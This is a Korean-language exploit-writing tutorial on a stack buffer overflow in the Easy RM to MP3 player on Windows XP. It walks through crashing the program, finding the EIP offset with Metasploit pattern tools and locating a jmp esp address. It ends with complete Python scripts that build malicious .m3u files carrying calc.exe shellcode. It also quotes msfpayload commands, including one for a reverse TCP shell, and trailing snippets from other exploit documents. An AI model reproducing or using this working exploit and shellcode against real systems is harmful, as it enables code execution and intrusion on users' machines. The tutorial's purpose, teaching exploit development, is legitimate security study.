Exploit writing tutorials

Size: px
Start display at page:

Download "Exploit writing tutorials"

Transcription

1 EXPLOIT WRITING TUTORIALS C1 STACK BASED BUFFER OVERFLOW KIM DONG HYUN WHATTEAM & LET S CQ & KOREA IT TECHNICAL SCHOOL rlaehdgus213@naver.com 페이지 0 / 24

2 Exploit writing tutorials C1 Stack Based Buffer Overflow hackpupu System hacking Series Exploit writing chapter 1 Let s CQ TEAM WHATTEAM KOREA IT Technical School Straw Hat Penetration Team rlaehdgus213@naver.com 페이지 1 / 24

3 Warring! 주의사항 본문서는보안에관련되어있는문서입니다. 이문서를악용해오는피해사항은전적으로사 용한본인에게있습니다. 본문서를복사, 배포또는수정이가능하나, 본작성자에대한언급을해주셨으면합니다. 프로젝트명 작성자 문서정보 Exploit Writing tutorials C1 Stack Based Buffer overflow 김동현 (hackpupu) 개정이력 버전수정일자작성자개요 1.0v 2014/07/03 김동현원본작성 페이지 2 / 24

4 목차 ⅰ. 개요 1-1 Exploit Writing 개요 1-2 System Security에대한중요성 1-3 Security에대한고찰 1-4 저자소개 ⅱ. C1 Stack Based Buffer Overflow 2-1 환경정보 2-2 Easy RM to MP3 Buffer Overflow 취약점 2-3 취약파일생성 2-4 Crash & Debugging확인 2-5 RET 거리계산 (MSF pattern_create) 2-6 Exploit ⅲ. 끝마치며 페이지 3 / 24

5 ⅰ. 개요 1-1 Exploit Writing 개요 Exploit Writing은 corelan Team에서발표한문서로윈도우기반의 Exploit을이해하는데매우큰도움이되는문서입니다. 현재 part1부터 part 11까지다루고있으며, 기초적인 Stack Based Buffer Overflow부터, 각종보안메커니즘을우회하는방법까지다루고있는, 기초부터심화과정까지의 Exploit을다루고있습니다. Windows Exploit을접하는데있어매우좋은문서라판별이되며, 저역시이러한문서들을번역및작성하며, 개인공부에치중을두고있는문서입니다. 또한, 우리나라에서는 Kiseclab 에서번역문서를배포하고있습니다. 영어가어려운분들은 Kiseclab에가셔서번역본을추가적으로보는걸추천합니다. 이문서또한, corelan에서나온문서를토대로작성하기에, 원본과큰차이점은없으나, 조금더쉽게설명하는부분에치중을두며작성하겠습니다. 1-2 System Security 에대한중요성 System Security에대한개인적인생각은이렇습니다. 항상우리가사용하고있는프로그램및어플리케이션은 System과관계가있으며, 특정 Bug를이용해서권한상승및악의적인행동이가능합니다. Example로, 한글취약점 (0-day) 등을이용해 APT공격시나리오를사용한다던지, 악성코드유포를위해 IE 취약점또는 JAVA, Adobe Flash 취약점등을이용해악성코드를유포하는등의방식은매우잘사용되는방식이며, 굳이사회공학적기법을이용하거나, 사용자에게클릭을유도할필요없이유포할수있기에, Critical할수있는부분이라생각하고있습니다. 또한, ms08-067같은 Critical한취약점의경우, 매우위험하고또한실제모의해킹시나리오를작성할때빠질수없는부분입니다. ( 실제로 Metasploit을이용해 3번의 Enter로해킹하는진귀한과정을볼수있습니다.) 이러한부분을공부하고, 또한 Bug를패치하며조금더 Hacker다운 Hacker가되지않나싶습니다. 0-day를찾았을때의희열을느끼기위함과, 보안성의향상을위해전공부하고있다고말씀드릴수있는부분입니다. 1-3 Security 에대한고찰 보안공부를이제시작하시는분들은읽었으면하는부분입니다. 저또한꾸준히공부하고있는입장이지만, 약 3년간공부를하며느껴왔던부분입니다. 문서를접하시고, 배우시고하는부분은정말좋습니다. 하지만외우는방식의공부는하지않기를저자는추천합니다. 같이공부하는분들또는가르쳐달라고하시는분들을보자면, 원리에대한이해보다는 Skill과우회방안, 또는신종공격기법 (0-day) 에대해모두외워버리시는분들이많습니다. 저또한처음에는그런방식으로최근까지공부를해왔습니다만, 2014년들어서는그러한방식의공부를버리고, 원리에대한궁금증이왔던것같습니다. 저보다빠르게이러한내용에의구심을가지신 Hacker분들은제가가고싶은위치에가있으신분들이정말많다는걸느끼고, 현재는원리에대한탐구를하고있습니다. 1-4 저자소개별거없는사람으로, 그저들은이야기많은잉여보안인력이다. 95년생으로액면가로만따지자면 85년생정도로추정된다. 밤새는걸즐겨하며, 술과담배를좋아한다. 목표는 50살전에우리나라보안인식을향상하는것과외국진출또는해킹연구소설립. 최근에는시스템 ( 굳이꼽자면 Android) 에매우관심이많은잉여. 페이지 4 / 24

6 ⅱ. 취약점분석 2-1 환경정보 환경구성은아래와같다. 운영체제 (OS) Windows XP Professional Service Pack 3(KR) Test 프로그램 East RM to mp3 Version Easy RM to mp3 Download -EasyRMtoMP3Converter.exe Debugger Immunity && Windbg Language Python 기타 Metasploit pattern creator Immunity 다운로드및설치다운로드 URL: Python 설치는 Immunity Debugger 설치중 Python도함께설치가된다. 또한, Python의버전은 2.7.1을사용했으며, 그이상또는이하의버전을사용할시문법적인부분의수정이필요하다. ( 버전에신경을쓰지않아도된다.) Debugging 설정 Immunity Debugger 를실행시킨뒤아래와같은, 순서로클릭을진행. 페이지 5 / 24

7 Windbg Windbg를통한디버깅또한할수있다. Windbg는, msdn에서공식적으로제공하는디버거로써, DOS 시절 16 bit 디버거인, debug.exe의 Windows 버전이라고할수있습니다. 콘솔화면에서키보드만으로디버깅을하는 debug.exe의사용자인터페이스를그대로가져왔으며, 처음입문의벽이높아힘들지만, 그기능은매우강력하다고할수있습니다. 커널모드의디버깅이가능하다는것과, 시스템에대한심볼 (Symbol) 을직접다운받을수있고, 시스템내부구조체 (Undocumented 포함 ) 및 API의정보를얻을수있습니다. 또한 Windows OS의덤프파일을읽어분석할수있기에, 프로그램 Crash의원인을분석할수있는매우강력한도구라고할수있습니다. 단점은, 코드에직접주석을입력할수없으며, Disassembly 코드에서호출되는 API 이름도타디버거에비해잘표시되지않습니다. Windbg 설치 다운로드 URL: 위의 URL 접속후, Get the standalone debugging tools as part of Windows 7 SDK 설치 Net Framework 관련 ERROR 출력시 추가설치시해결된다. SDK를설치하며, Debugger에체크를한뒤설치를해야 Windbg가정상적으로설치가됨을확인할수있다. 페이지 6 / 24

8 Post-mortem 설정 프로세스또는서비스에서 crash 가발생하면그메모리의내용을저장하는설정이다. Windbg I 명령어로 Listening 상태로만들수있다. 페이지 7 / 24

9 Windbg Symbol 설정 C: 드라이브에 Symbols 폴더생성 ( 임의의폴더명으로지정해도됨 ) Windbg File Symbole file path 에 SRV*C:\Symbols* 이.microsoft.com/download/symbols 문장삽입 이제 Windbg와 Immunity Debugger 및실습환경의 Setting이끝났다. 이 2가지의 Debugger로어플리케이션및서비스에일어나는 Bug에대해서는분석할수있을것이며, 이제 2-2 부분부터는, Easy RM to MP3 Buffer Overflow 취약점에대해서분석하고, 그에따른 Buffer Overflow 취약점에대한원리를이해하는방향으로문서를이어나갈것이다. 페이지 8 / 24

10 2-2 Easy RM to MP3 Buffer Overflow 취약점 Easy RM to MP3 에대해서, Easy RM to MP3 는 MP3 Player 로써, 조금오래된프로그램이다. 본문서에서설명하는취약점은, m3u 파일을읽어올때발생하며, Buffer Overflow 취 약점이다. 2-3 취약파일생성취약파일생성은간단하게할수있다. 아래와같은 Python Code를통해서할수있으며, python 및 Perl, C 언어등언어에구애받지않고, Exploit Code를만들수있음에유의하자. 단 Python의경우여러 Hacker들을위한 Module들이많고, 그에따른빠른 Exploit code 작성이가능하다. ( 추후문서에언급되고, Fuzzing 및 Exploit에사용되는 mona.py도 Python으로작성되어있으니, Python을익혀놓으면많은도움이될것이다.) 취약파일생성코드는아래와같다. f = open( test.m3u, wb ) junk = \x41 * f.write(junk) f.close() print File Create Success 위 Code 를 Notepad 및타편집프로그램으로진행해도된다. 그후, 파일생성은 cmd 에 서진행사항을확인해도되고, py 코드를직접더블클릭을통해실행해도된다. 페이지 9 / 24

11 2-4 Crash & Debugging확인위의코드를통해생성된 test.m3u 파일을 Easy RM to mp3에서 load하게되면, 프로세스가 crash 됨을확인할수있다. 방금, Windbg를 Listening 모드로실행시켜놓았다면아래와같은화면이나오게된다. 실행시켜놓지않았다면, 아래와같은화면이나오게된다. ( 저기능을끄고싶다면, 레지스트리편집기에서 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug 부분에서, Auto 값을 0으로변경하면된다. 번외로 Debugger 값은 Crash가발생했을때, 실행시킬 Debugger의절대경로이다 ) 이제디버깅을통해서, Crash 가난부분을찾아야한다. 페이지 10 / 24

12 F9 를눌러, Easy RM to MP3 프로그램을실행한뒤, test.m3u 파일을 load 한다. test.m3u 파일 load 후 Crash 확인 위의사진을보면, EIP 값은 (AAAA) 로채워져있고, Stack은 AAAA로가득차있음을확인할수있다. Crash의원인은 m3u파일을읽어올때, 예외처리를제대로해주지않아일어나며, 파일내용중한부분의조작을통해 EIP 값을조작할수있음을알수있다. 이걸그림으로도식화해보면아래와같은그림이나오게된다. 페이지 11 / 24

13 Argument RET(EIP가됨 ) EBP Buffer Stack Frame High Level AAAAAAAAAAAAAA (m3u file content) AAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Low Level 위의 Easy RM to MP3 프로그램처럼모든프로그램 ( 서비스포함 ) 에서 Crash가난다고해도, 모두공격이가능한것은아니다. ( 공격가능성이높다는걸 Exploitable하다고, 한다. 단계는총 4단계가있음 ) 즉, 공격은 EIP(RET) 를조작하는것이며, Exploitable 하다는내용은, RET 또는 EIP를마음대로변경할수있는가를말한다고할수있다. 또한, 이러한 Bug 를찾아내는방식에는여러기법이있으며, 그중 Fuzzing 을나중에문 서화해공개할예정이다. 여러버퍼크기를구하는방식은많지만, 여기서는 Metasploit 의내장모듈인 pattern_create.rb 파일을통해서, 버퍼크기를알아보고, 실제 Shellcode 를넣는과정을소 개할것이다. 페이지 12 / 24

14 2-5 RET 거리계산 (MSF pattern_create) Metasploit 내장모듈을통해알아보기전에, 먼저조금더정확한크기를구해야한다. (30000자를모두 Bruteforce 형식으로찾으면의미가없지않겠는가 ) 그래서, Python Script를조금수정하여, 25000개의 A값과 5000개의 B값을넣는코드를작성한다. f = open( test.m3u, wb ) junk = \x41 * junk += \x42 * 5000 f.write(junk) f.close() print File Create Success 다음과같은 python 코드를작성하여, 실행시키고 test.m3u파일을생성한뒤다시 Immunity Debugger를통해로드해보자. 위의사진을보면알수있듯, EIP값이 (BBBB) 로변경됨을확인할수있다. 고로, EIP의값이영향을받는위치는 25,001 ~ 30,000 사이에있음을알수있다. 이러한내용을토대로, Metasploit pattern_create.rb를통해서, 5000개의중복되지않은문자열을생성할수있다. 원래의문서에서는 Backtrack5를기준으로설명했으나, 여기서는최신의 Kali linux를통해서설명하겠다. 위치는 /usr/share/metasploit-framework.tools/pattern_create.rb 의경로에위치하고있으며명령어는 Pattern_create.rb 생성하고싶은문자열길이로하면된다. ex)./pattern_create.rb 5000 페이지 13 / 24

15 이문자열을, Python code에작성해서넣으면된다. f = open( test.m3u, wb ) junk = \x41 * junk += Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0 Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae 3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af f.write(junk) f.close() print File Create Success 그후다시 m3u파일을생성한뒤, Crash를확인하면 EIP의문자열을확인할수있다. ( 번외로, mona.py를이용하면 Immunity Debugger에서직접확인할수있다. 이는 pattern_create에서나온결과와똑같으며, 밑에설명될 pattern_offset도똑같이확인할수있다. 이는 Python의매력중하나라고할수있다.) 페이지 14 / 24

16 EIP 의값이 6A42336A 에있음을확인할수있으며, 이걸 pattern_offset.rb 를통해 offset 의 위치를확인하면 1060 임을확인할수있다. 그렇다면이제위에나온내용을토대로, 계산을해보면 = 임을확인할수있다. 이를그림으로도식화해보면 Stack Frame High Address Argument RET 26, EBP Buffer Low Address 위와같은그림이나오게된다. 이제실제로, Offset을 Test하기위한 Python 코드를수정한다. f = open("test.m3u","wb") junk = "\x41" * eip = "BBBB" f.write(junk + eip) f.close() print "File Create Success" 그리고다시, m3u 파일을생성한뒤, Crash를확인해보면, 아래와같은사진처럼 EIP가 (BBBB) 로조작이됨을확인할수있다. 페이지 15 / 24

17 이제실질적으로, RET(EIP) 를조작할수있음을확인할수있고, 실제 offset 까지알았으니 Exploit code 를작성해야된다. 궁극적으로 Shellcode 를어디에넣어야하며, 어떻게 RET 를조 작해, Shellcode 가있는부분으로 Jump 를할수있는가? 에대한고민이필요하다. 페이지 16 / 24

18 2-6 Exploit 먼저, 다음과같이스크립트수정을통해 Shell code가어디에들어갈수있는지한번생각을해볼필요가있다. 아래와같이스크립트를수정한뒤, 다시 Crash를확인해보자. f = open("test.m3u","wb") junk = "\x41" * eip = "BBBB" shellcode = ( "KimDongHyunExploitWriting" ) f.write(junk + eip + shellcode) f.close() print "File Create Success" 다시, Crash를확인하면어디쯤에 shellcode가들어갈수있는지확인할수있다. 2 가지의사실을확인할수있다. 1. ESP 는 0x000FF730 을가리킨다. 2. Shellcode 가시작되는 KimD 는 0x000FF730 보다, 4Byte 낮은주소에위치한다. 페이지 17 / 24

19 위설명을그림으로표현하면다음아래와같은화면이나온다. Stack Frame KimD ESP(0x000FF730) ongh Argument RET 26, EBP Buffer High Address Low Address ESP는 0x000FF730부터시작되고, Shellcode가시작되는문자열은 [ESP-4] 위치에있다, 때문에 RET와 Shellcode문자열사이에는 Dummy Code(4Byte) 가들어가야된다. 그에따라, Python code를아래와같이수정을한번더한다. f = open("test.m3u","wb") junk = "\x41" * eip = "BBBB" dummy = DUMM shellcode = ( "KimDongHyunExploitWriting" ) f.write(junk + eip + dummy + shellcode) f.close() print "File Create Success" 그후, 다시 python 코드를실행시킨뒤, Crash 를확인하면, 우리가원하는 ESP 주소에, Shellcode 를작성할수있으며, 아래와같은결과를도출할수있다. EIP 를통제할수있으며, Shellcode 를작성할수있는공간은 ESP(0x00FF730) 이다. 코드는아래와같이나올수있다. 26,060 개의문자열 + ESP + 4Byte Dummy + Shellcode 페이지 18 / 24

20 실제그럼, nop 코드를실행하는파일을생성한뒤, Crash 를확인해보자. from struct import pack f = open( test.m3u, wb ) junk = A * eip = pack( <L, 0x000ff730) shellcode = \x90 * 25 shellcode += \xcc f.write(junk + eip + shellcode) f.close print File Create Success 그후 Tracing(F8) 을해보면, 아래와같은에러가나오게된다.(Access Violation when writing to [ ]) 물론 EIP와 ESP 값은정상적으로들어가있지만, NULL Byte를만나, 우리가원하는 Code가정상적으로실행되지않음을볼수있다. 우리가원하는지점까지프로그램이도달하지못했다고할수있으며, 메모리주소를 Static하게직접 Jump하는방식은좋은방식이아니다. 결론적으로, 우리가 EIP를 0x000ff730을직접덮어써서, Shellcode의위치로 Jump하게할수는없다는말이다. 이러할때, 프로그램에게 Import된 dll을가져와사용하면된다. 프로그램실행간에자체적으로명령코드를가지는하나이상의 DLL을사용하며, dll에의해사용되는명령어주소들은정적이라매우편하게사용할수있다. (ASLR 보안메커니즘이적용되기전 ) 페이지 19 / 24

21 그럼이제, East RM to MP3 프로그램을실행시켜, Immunity Debugger로 Process Attach해, 사용되는 DLL파일을보고, Shellcode로점프할수있는 Assembly 명령어를찾으면된다. 먼저, Easy RM to MP3를실행시킨다. 그뒤, Immunity Debugger를실행시킨뒤, East RM to MP3 를 Attach 시킨다. 그뒤, Import 되어있는 Dll 을확인해야된다. View Exceutable modules 이제, jmp esp란 Assembly 명령에대해서찾아야되는데, 디버거를활용하면매우편하게찾을수있다. CPU탭에간뒤, 오른쪽클릭 Search for Allcommands in all modules jmp esp를사용하면, 현재사용되고있는모든 dll 에서, jmp esp를사용하는주소를확인할수있다. 페이지 20 / 24

22 그뒤, 확인하게되면 jmp esp 를사용하는 DLL 과, 주소를확인할수있다. 여기서중요한점은, null 바이트이후의코드는사용할수없는코드이기때문에, 주소를 선택할시 null 바이트가들어가있지않은 (00 이포함되지않은 ) 코드가필요하게된다. 페이지 21 / 24

23 from struct import pack f = open("test.m3u", "wb") junk = "A" * eip = pack("<l", 0x01D8F23F) # in MSRMCc_2 shellcode = "\x90" * 25 shellcode += "\xcc" f.write(junk + eip + shellcode) f.close print "File Create Success" 필자의경우, MSRMCc_2.dll안에있는 jmp esp 명령의주소를입력했다. 그뒤, test.m3u파일을재생성한뒤, crash를다시점검해보자. 실행을하게되면, jmp esp 명령과, 우리가추가적으로넣어준 Shellcode(NOP, CC) 코드가정 상적으로실행이되고그다음, 0000(ADD DS:[EAX], AL) 이실행됨을알수있다. 완벽한 Shellcode 가아니기에, 아직우리가추가적으로하고싶은공격은하지못하는단계이다. Metasploit을이용해만드는방식은아래와같다. msfpayload windows/exec CMD=calc.exe R msfencode -b "\x00" # 계산기쉘코드 msfpayload windows/shell/reverse_tcp LHOST= LPORT=4444 R msfencode -b "\x00" # 리버스쉘코드 필자는, calc.exe 를실행시키는걸좋아함으로, cmd.exe 를실행시키는 Shellcode 를만들어보 겠다. ( 사실, cmd.exe 로할계획이였으나, Shellcode ERROR 로 calc.exe 로변경 ) 페이지 22 / 24

24 위와같은 Shellcode 를이용해서나온최종적인 Python code 는아래와같다. from struct import pack f = open("test.m3u", "wb") junk = "A" * eip = pack("<l", 0x77d09353) nop= "\x90" * 25 shellcode = "\xda\xcd\xbb\x10\x0b\xf7\x4f\xd9\x74\x24\xf4\x58\x29\xc9"\ "\xb1\x33\x83\xc0\x04\x31\x58\x13\x03\x48\x18\x15\xba\x94"\ "\xf6\x50\x45\x64\x07\x03\xcf\x81\x36\x11\xab\xc2\x6b\xa5"\ "\xbf\x86\x87\x4e\xed\x32\x13\x22\x3a\x35\x94\x89\x1c\x78"\ "\x25\x3c\xa1\xd6\xe5\x5e\x5d\x24\x3a\x81\x5c\xe7\x4f\xc0"\ "\x99\x15\xbf\x90\x72\x52\x12\x05\xf6\x26\xaf\x24\xd8\x2d"\ "\x8f\x5e\x5d\xf1\x64\xd5\x5c\x21\xd4\x62\x16\xd9\x5e\x2c"\ "\x87\xd8\xb3\x2e\xfb\x93\xb8\x85\x8f\x22\x69\xd4\x70\x15"\ "\x55\xbb\x4e\x9a\x58\xc5\x97\x1c\x83\xb0\xe3\x5f\x3e\xc3"\ "\x37\x22\xe4\x46\xaa\x84\x6f\xf0\x0e\x35\xa3\x67\xc4\x39"\ "\x08\xe3\x82\x5d\x8f\x20\xb9\x59\x04\xc7\x6e\xe8\x5e\xec"\ "\xaa\xb1\x05\x8d\xeb\x1f\xeb\xb2\xec\xc7\x54\x17\x66\xe5"\ "\x81\x21\x25\x63\x57\xa3\x53\xca\x57\xbb\x5b\x7c\x30\x8a"\ "\xd0\x13\x47\x13\x33\x50\xb7\x59\x1e\xf0\x50\x04\xca\x41"\ "\x3d\xb7\x20\x85\x38\x34\xc1\x75\xbf\x24\xa0\x70\xfb\xe2"\ "\x58\x08\x94\x86\x5e\xbf\x95\x82\x3c\x5e\x06\x4e\xed\xc5"\ "\xae\xf5\xf1" f.write(junk + eip + nop + shellcode) f.close print "File Create Success" 페이지 23 / 24

25 그후, test.m3u 파일을재생성하고, 불러오면 calc.exe 가성공적으로나옴을확인할수있 다. Success Stack based Buffer Overflow!! ⅲ. 끝마치며 이에대한취약점원인분석도물론필요하겠지만, 최종적으로이문서시리즈를번역및여러문서를참고해작성하며개인적으로생각해놓은부분이 Exploit finding이다. 고로, 원인분석보다는, 실제로이러한 Exploit을 Tracing 해보고, Exploit code를만들어가며따라감을목표로하고있다. Chapter1 Stack Based Overflow의핵심은 ( 필자가생각한 ) 아래와같다. 1. Buffer Overflow를통한실제타프로그램실행시키기 2. Buffer Overflow에대한 Based 지식 3. Buffer Overflow가발생하는원인중하나인, Buffer의경계값을검증하지않을시 EIP변조가가능하다. 4. EIP변조를직접하는것보다. 참조 (IMPORT) 되어있는 DLL을이용하는것이매우효율적이다. 다음 Chapter2 Jump shellcode 전에, 분명하게알아둬야할내용이 Chapter 1 의내용이 라고할수있다. 페이지 24 / 24

Deok9_Exploit Technique

Deok9_Exploit Technique Exploit Technique CodeEngn Co-Administrator!!! and Team Sur3x5F Member Nick : Deok9 E-mail : DDeok9@gmail.com HomePage : http://deok9.sur3x5f.org Twitter :@DDeok9 > 1. Shell Code 2. Security

More information

본문서는 Syngress 의 Writing Security Tools and Exploits Chap11 을요약정리한 것입니다. 참고로 Chap 10 ~ 12 까지가 Metasploit 에대한설명입니다. Metasploit Framework 활용법 1. Metasplo

본문서는 Syngress 의 Writing Security Tools and Exploits Chap11 을요약정리한 것입니다. 참고로 Chap 10 ~ 12 까지가 Metasploit 에대한설명입니다. Metasploit Framework 활용법 1. Metasplo 본문서는 Syngress 의 Writing Security Tools and Exploits Chap11 을요약정리한 것입니다. 참고로 Chap 10 ~ 12 까지가 Metasploit 에대한설명입니다. Metasploit Framework 활용법 1. Metasploit Framework(MSF) 이란? bluearth in N@R 2003년오픈소스로발표된취약점발견및공격을위한

More information

how_2_write_Exploit_4_the_MSF_v3.x.hwp

how_2_write_Exploit_4_the_MSF_v3.x.hwp Metasploit v3.0 을이용한 Exploit 작성하기 2008.1.18 본문서는 Jerome 님의 Writing Windows Exploits 을기반으로작성된문서임을밝힙니다. rich4rd rich4rd.lim@gmail.com - 1 - 목차. 1. 소개및개요 2. 배경지식 3. Exploit module 실습 3.1 Exploit module 수정하기

More information

취약점분석보고서 [Photodex ProShow Producer v ] RedAlert Team 안상환

취약점분석보고서 [Photodex ProShow Producer v ] RedAlert Team 안상환 취약점분석보고서 [Photodex ProShow Producer v5.0.3256] 2012-07-24 RedAlert Team 안상환 목 차 1. 개요... 1 1.1. 취약점분석추진배경... 1 2. Photodex ProShow Producer Buffer Overflow 취약점분석... 2 2.1. Photodex ProShow Producer Buffer

More information

ActFax 4.31 Local Privilege Escalation Exploit

ActFax 4.31 Local Privilege Escalation Exploit NSHC 2013. 01. 14. 취약점분석보고서 Information Service about a new vulnerability Version 1.0 [ ] 2012 Red Alert. All Rights Reserved. 목차 1. 개요... 3 2. 공격... 4 3. 분석... 8 4. 결론... 12 5. 대응방안... 12 6. 참고자료... 13

More information

hlogin2

hlogin2 0x02. Stack Corruption off-limit Kernel Stack libc Heap BSS Data Code off-limit Kernel Kernel : OS Stack libc Heap BSS Data Code Stack : libc : Heap : BSS, Data : bss Code : off-limit Kernel Kernel : OS

More information

Microsoft Word - Exploit writing tutorial part 1.doc

Microsoft Word - Exploit writing tutorial part 1.doc Exploit writing tutorial part 1: Stack Based Overflows 1 By Peter Van Eeckhoutte 편역 : vangelis(vangelis@s0f.org) 2009년 7월 17일, Crazy_Hacker 라는닉을가진사람이패킷스톰을통해 Easy RM to MP3 Converte에존재하는취약점 (http://packetstormsecurity.org/0907-exploits/)

More information

커알못의 커널 탐방기 이 세상의 모든 커알못을 위해서

커알못의 커널 탐방기 이 세상의 모든 커알못을 위해서 커알못의 커널 탐방기 2015.12 이 세상의 모든 커알못을 위해서 개정 이력 버전/릴리스 0.1 작성일자 2015년 11월 30일 개요 최초 작성 0.2 2015년 12월 1일 보고서 구성 순서 변경 0.3 2015년 12월 3일 오탈자 수정 및 글자 교정 1.0 2015년 12월 7일 내용 추가 1.1 2015년 12월 10일 POC 코드 삽입 및 코드

More information

Microsoft Word - ntasFrameBuilderInstallGuide2.5.doc

Microsoft Word - ntasFrameBuilderInstallGuide2.5.doc NTAS and FRAME BUILDER Install Guide NTAS and FRAME BUILDER Version 2.5 Copyright 2003 Ari System, Inc. All Rights reserved. NTAS and FRAME BUILDER are trademarks or registered trademarks of Ari System,

More information

취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환

취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환 취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit 2012-07-19 RedAlert Team 안상환 목 차 1. 개요... 1 1.1. 취약점분석추진배경... 1 2. Simple Web Server 취약점... 2 2.1. Simple Web Server 취약점개요... 2 2.2. Simple

More information

취약점분석보고서 [Elecard AVC_HD/MPEG Player 5.7 Buffer Overflow] RedAlert Team 봉용균

취약점분석보고서 [Elecard AVC_HD/MPEG Player 5.7 Buffer Overflow] RedAlert Team 봉용균 취약점분석보고서 [Elecard AVC_HD/MPEG Player 5.7 Buffer Overflow] 2012-08-02 RedAlert Team 봉용균 목 차 1. 개요... 1 1.1. 배경... 1 1.2. 요약... 1 1.3. 정보... 1 1.4. 대상시스템... 1 2. 공격... 2 2.1. 시나리오... 2 2.2. 대상프로그램... 2 2.3.

More information

취약점분석보고서 [CyberLink Power2Go name attribute (p2g) Stack Buffer Overflow Exploit] RedAlert Team_ 강동우

취약점분석보고서 [CyberLink Power2Go name attribute (p2g) Stack Buffer Overflow Exploit] RedAlert Team_ 강동우 취약점분석보고서 [CyberLink Power2Go name attribute (p2g) Stack Buffer Overflow Exploit] 2012-07-19 RedAlert Team_ 강동우 목 차 1. 개요... 1 1.1. 취약점분석추진배경... 1 1.2. Power2Go name Stack Buffer Overflow 취약점요약... 1 2.

More information

1.hwp

1.hwp 윈도우 멀티미디어 취약점 분석 방법론 연구 수탁기관 : 한양대학교 산학협력단 2009. 09 25,000 2008 2009(1~8월 ) 20,000 15,000 11,818 10,000 5,000-11,362 3,344 2,756 603 173 2-366 165 1 1 기업 대학 비영리 연구소 네트워크 기타(개인)

More information

목 차 1. 개 요... 1 1.1. 배경... 1 1.2. 요약... 1 1.3. 정보... 2 1.4. 대상시스템... 2 1.5. 원리... 2 2. 공격 기법 및 기본 개념... 3 2.1. Heap Spray... 3 2.2. Font... 4 3. 공 격..

목 차 1. 개 요... 1 1.1. 배경... 1 1.2. 요약... 1 1.3. 정보... 2 1.4. 대상시스템... 2 1.5. 원리... 2 2. 공격 기법 및 기본 개념... 3 2.1. Heap Spray... 3 2.2. Font... 4 3. 공 격.. 취약점 분석 보고서 [ Adobe Flash Player 11.3 Kern Table Parsing Integer Overflow - CVE-2012-1535 ] 2012-08-23 RedAlert Team 안상환 목 차 1. 개 요... 1 1.1. 배경... 1 1.2. 요약... 1 1.3. 정보... 2 1.4. 대상시스템... 2 1.5. 원리...

More information

PowerPoint Template

PowerPoint Template BoF 원정대서비스 목차 환경구성 http://www.hackerschool.org/hs_boards/zboard.php?id=hs_notice&no=1170881885 전용게시판 http://www.hackerschool.org/hs_boards/zboard.php?id=bof_fellowship Putty War game 2 LOB 란? 해커스쿨에서제공하는

More information

Microsoft PowerPoint - chap02-C프로그램시작하기.pptx

Microsoft PowerPoint - chap02-C프로그램시작하기.pptx #include int main(void) { int num; printf( Please enter an integer "); scanf("%d", &num); if ( num < 0 ) printf("is negative.\n"); printf("num = %d\n", num); return 0; } 1 학습목표 을 작성하면서 C 프로그램의

More information

목 차 1. 개요 취약점분석추진배경 취약점요약 취약점정보 취약점대상시스템목록 분석 공격기법및기본개념 시나리오 공격코드

목 차 1. 개요 취약점분석추진배경 취약점요약 취약점정보 취약점대상시스템목록 분석 공격기법및기본개념 시나리오 공격코드 취약점분석보고서 [Aviosoft Digital TV Player Professional 1.x Stack Buffer Overflow] 2012-08-08 RedAlert Team 강동우 목 차 1. 개요... 1 1.1. 취약점분석추진배경... 1 1.2. 취약점요약... 1 1.3. 취약점정보... 1 1.4. 취약점대상시스템목록... 1 2. 분석...

More information

hlogin7

hlogin7 0x07. Return Oriented Programming ROP? , (DEP, ASLR). ROP (Return Oriented Programming) (excutable memory) rop. plt, got got overwrite RTL RTL Chain DEP, ASLR gadget Basic knowledge plt, got call function

More information

<41736D6C6F D20B9AEBCADBEE7BDC42E687770>

<41736D6C6F D20B9AEBCADBEE7BDC42E687770> IDA Remote Debugging 2007. 01. 이강석 / certlab@gmail.com http://www.asmlove.co.kr - 1 - Intro IDA Remote debugging에대해알아봅시다. 이런기능이있다는것을잘모르시는분들을위해문서를만들었습니다. IDA 기능중에분석할파일을원격에서디버깅할수있는기능이있는데먼저그림과함께예를들어설명해보도록하겠습니다.

More information

Microsoft Word - MSOffice_WPS_analysis.doc

Microsoft Word - MSOffice_WPS_analysis.doc MS Office.WPS File Stack Overflow Exploit 분석 (http://milw0rm.com/ 에공개된 exploit 분석 ) 2008.03.03 v0.5 By Kancho ( kancholove@gmail.com, www.securityproof.net ) milw0rm.com에 2008년 2월 13일에공개된 Microsoft Office.WPS

More information

Microsoft Word - Heap_Spray.doc

Microsoft Word - Heap_Spray.doc Heap Spray 본문서는 최근 웹 브라우저를 이용한 공격에 사용되는 Heap Spray 기법에 대한 내용을 수록하였다. 관련 내용에 대하여 많은 도움이 되기 바란다. 문서 내용은 초보자도 쉽게 이해할 수 있도록 관련 내용에 대한 설명을 포함하였다. Hacking Group OVERTIME force< forceteam01@gmail.com > 2007.05.13

More information

1. 자바프로그램기초 및개발환경 2 장 & 3 장. 자바개발도구 충남대학교 컴퓨터공학과

1. 자바프로그램기초 및개발환경 2 장 & 3 장. 자바개발도구 충남대학교 컴퓨터공학과 1. 자바프로그램기초 및개발환경 2 장 & 3 장. 자바개발도구 충남대학교 컴퓨터공학과 학습내용 1. Java Development Kit(JDK) 2. Java API 3. 자바프로그래밍개발도구 (Eclipse) 4. 자바프로그래밍기초 2 자바를사용하려면무엇이필요한가? 자바프로그래밍개발도구 JDK (Java Development Kit) 다운로드위치 : http://www.oracle.com/technetwork/java/javas

More information

ActFax 4.31 Local Privilege Escalation Exploit

